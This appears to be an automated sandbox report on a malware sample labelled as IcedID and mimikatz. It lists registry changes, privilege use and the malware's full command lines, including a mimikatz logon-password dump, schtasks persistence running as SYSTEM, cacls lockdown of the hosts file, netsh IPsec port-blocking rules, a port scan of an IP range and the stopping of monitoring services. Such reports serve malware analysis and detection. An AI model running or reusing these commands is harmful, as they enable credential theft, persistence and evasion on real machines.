\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nusubcedp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zqkkhilub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zyejeil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language joxnkm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4256 cmd.exe 492 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000b000000023b79-6.dat nsis_installer_2 behavioral2/files/0x000b000000023b94-15.dat nsis_installer_1 behavioral2/files/0x000b000000023b94-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zyejeil.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zyejeil.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zyejeil.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zyejeil.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zyejeil.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zyejeil.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ucqzmelym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ucqzmelym.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zyejeil.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 492 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5060 schtasks.exe 4092 schtasks.exe 4260 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4880 zyejeil.exe Token: SeDebugPrivilege 2696 zyejeil.exe Token: SeDebugPrivilege 2968 vfshost.exe Token: SeDebugPrivilege 4792 ucqzmelym.exe Token: SeLockMemoryPrivilege 4972 ejzklm.exe Token: SeLockMemoryPrivilege 4972 ejzklm.exe Token: SeDebugPrivilege 2312 ucqzmelym.exe Token: SeDebugPrivilege 448 ucqzmelym.exe Token: SeDebugPrivilege 4900 ucqzmelym.exe Token: SeDebugPrivilege 1616 ucqzmelym.exe Token: SeDebugPrivilege 4956 ucqzmelym.exe Token: SeDebugPrivilege 3104 ucqzmelym.exe Token: SeDebugPrivilege 3736 ucqzmelym.exe Token: SeDebugPrivilege 1360 ucqzmelym.exe Token: SeDebugPrivilege 1040 ucqzmelym.exe Token: SeDebugPrivilege 4792 ucqzmelym.exe Token: SeDebugPrivilege 776 ucqzmelym.exe Token: SeDebugPrivilege 3176 ucqzmelym.exe Token: SeDebugPrivilege 4156 ucqzmelym.exe Token: SeDebugPrivilege 2176 ucqzmelym.exe Token: SeDebugPrivilege 3800 ucqzmelym.exe Token: SeDebugPrivilege 2820 ucqzmelym.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe 4880 zyejeil.exe 4880 zyejeil.exe 2696 zyejeil.exe 2696 zyejeil.exe 964 xohudmc.exe 904 joxnkm.exe 2372 zyejeil.exe 2372 zyejeil.exe 4796 zyejeil.exe 4796 zyejeil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 208 wrote to memory of 4256 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe 83 PID 208 wrote to memory of 4256 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe 83 PID 208 wrote to memory of 4256 208 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe 83 PID 4256 wrote to memory of 492 4256 cmd.exe 85 PID 4256 wrote to memory of 492 4256 cmd.exe 85 PID 4256 wrote to memory of 492 4256 cmd.exe 85 PID 4256 wrote to memory of 4880 4256 cmd.exe 87 PID 4256 wrote to memory of 4880 4256 cmd.exe 87 PID 4256 wrote to memory of 4880 4256 cmd.exe 87 PID 2696 wrote to memory of 1484 2696 zyejeil.exe 89 PID 2696 wrote to memory of 1484 2696 zyejeil.exe 89 PID 2696 wrote to memory of 1484 2696 zyejeil.exe 89 PID 1484 wrote to memory of 3728 1484 cmd.exe 91 PID 1484 wrote to memory of 3728 1484 cmd.exe 91 PID 1484 wrote to memory of 3728 1484 cmd.exe 91 PID 1484 wrote to memory of 4528 1484 cmd.exe 92 PID 1484 wrote to memory of 4528 1484 cmd.exe 92 PID 1484 wrote to memory of 4528 1484 cmd.exe 92 PID 1484 wrote to memory of 3252 1484 cmd.exe 93 PID 1484 wrote to memory of 3252 1484 cmd.exe 93 PID 1484 wrote to memory of 3252 1484 cmd.exe 93 PID 1484 wrote to memory of 3800 1484 cmd.exe 94 PID 1484 wrote to memory of 3800 1484 cmd.exe 94 PID 1484 wrote to memory of 3800 1484 cmd.exe 94 PID 1484 wrote to memory of 1616 1484 cmd.exe 96 PID 1484 wrote to memory of 1616 1484 cmd.exe 96 PID 1484 wrote to memory of 1616 1484 cmd.exe 96 PID 1484 wrote to memory of 2688 1484 cmd.exe 97 PID 1484 wrote to memory of 2688 1484 cmd.exe 97 PID 1484 wrote to memory of 2688 1484 cmd.exe 97 PID 2696 wrote to memory of 4928 2696 zyejeil.exe 98 PID 2696 wrote to memory of 4928 2696 zyejeil.exe 98 PID 2696 wrote to memory of 4928 2696 zyejeil.exe 98 PID 2696 wrote to memory of 1036 2696 zyejeil.exe 100 PID 2696 wrote to memory of 1036 2696 zyejeil.exe 100 PID 2696 wrote to memory of 1036 2696 zyejeil.exe 100 PID 2696 wrote to memory of 3720 2696 zyejeil.exe 102 PID 2696 wrote to memory of 3720 2696 zyejeil.exe 102 PID 2696 wrote to memory of 3720 2696 zyejeil.exe 102 PID 2696 wrote to memory of 1988 2696 zyejeil.exe 115 PID 2696 wrote to memory of 1988 2696 zyejeil.exe 115 PID 2696 wrote to memory of 1988 2696 zyejeil.exe 115 PID 1988 wrote to memory of 4856 1988 cmd.exe 117 PID 1988 wrote to memory of 4856 1988 cmd.exe 117 PID 1988 wrote to memory of 4856 1988 cmd.exe 117 PID 4856 wrote to memory of 2316 4856 wpcap.exe 118 PID 4856 wrote to memory of 2316 4856 wpcap.exe 118 PID 4856 wrote to memory of 2316 4856 wpcap.exe 118 PID 2316 wrote to memory of 1756 2316 net.exe 120 PID 2316 wrote to memory of 1756 2316 net.exe 120 PID 2316 wrote to memory of 1756 2316 net.exe 120 PID 4856 wrote to memory of 4912 4856 wpcap.exe 121 PID 4856 wrote to memory of 4912 4856 wpcap.exe 121 PID 4856 wrote to memory of 4912 4856 wpcap.exe 121 PID 4912 wrote to memory of 1468 4912 net.exe 123 PID 4912 wrote to memory of 1468 4912 net.exe 123 PID 4912 wrote to memory of 1468 4912 net.exe 123 PID 4856 wrote to memory of 4280 4856 wpcap.exe 124 PID 4856 wrote to memory of 4280 4856 wpcap.exe 124 PID 4856 wrote to memory of 4280 4856 wpcap.exe 124 PID 4280 wrote to memory of 4368 4280 net.exe 126 PID 4280 wrote to memory of 4368 4280 net.exe 126 PID 4280 wrote to memory of 4368 4280 net.exe 126 PID 4856 wrote to memory of 208 4856 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2044
-
C:\Windows\TEMP\stjqapuut\ejzklm.exe"C:\Windows\TEMP\stjqapuut\ejzklm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Users\Admin\AppData\Local\Temp\2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uzepkltb\zyejeil.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:492
-
-
C:\Windows\uzepkltb\zyejeil.exeC:\Windows\uzepkltb\zyejeil.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4880
-
-
-
C:\Windows\uzepkltb\zyejeil.exeC:\Windows\uzepkltb\zyejeil.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3728
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3252
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2688
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4928
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1036
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3720
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exeC:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1756
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4368
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:208 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:952
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1668 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4420
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:436 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3848
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt2⤵PID:1788
-
C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exeC:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lrcwzntnt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3544 -
C:\Windows\lrcwzntnt\Corporate\vfshost.exeC:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"2⤵PID:3632
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"2⤵PID:3740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5060
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:688
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1828
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1108
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2972
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:456
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
